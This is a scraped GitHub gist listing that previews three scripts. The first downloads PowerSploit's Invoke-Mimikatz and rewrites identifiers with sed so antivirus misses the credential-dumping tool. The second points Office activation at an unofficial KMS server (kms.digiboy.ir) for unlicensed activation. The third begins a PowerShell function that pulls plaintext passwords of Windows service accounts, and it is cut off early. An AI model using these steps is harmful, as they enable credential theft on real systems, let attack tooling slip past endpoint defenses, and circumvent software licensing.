misuchiru03
PaulSec
/ invoke_evasion.sh
Created
August 1, 2017 13:50
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # AV Bypass to run Mimikatz | |
| # From: https://www.blackhillsinfosec.com/?p=5555 | |
| # Server side: | |
| wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
| sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
| sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
| sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
mokoshalb
/ Office_kms
Created
July 4, 2019 05:36
— forked from CHEF-KOCH/KMS_office.cmd
KMS server Windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cd\Program Files\Microsoft Office\Office16 | |
| cd\Program Files (x86)\Microsoft Office\Office16 | |
| cscript OSPP.VBS /sethst:kms.digiboy.ir | |
| cscript OSPP.VBS /actcscript OSPP.VBS /dstatus | |
| slmgr.vbs /ckms |
jborean93
/ Get-ServiceCredential.ps1
Last active
August 27, 2024 13:37
Get's the username and password for installed Windows services
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copyright: (c) 2019, Jordan Borean (@jborean93) <[email protected]> | |
| # MIT License (see LICENSE or https://opensource.org/licenses/MIT) | |
| Function Get-ServiceCredential { | |
| <# | |
| .SYNOPSIS | |
| Retrieve the username and plaintext password for all services installed on the local computer. | |
| .DESCRIPTION | |
| Will retrieve the username and plaintext password for the service(s) specified. This must be run as an |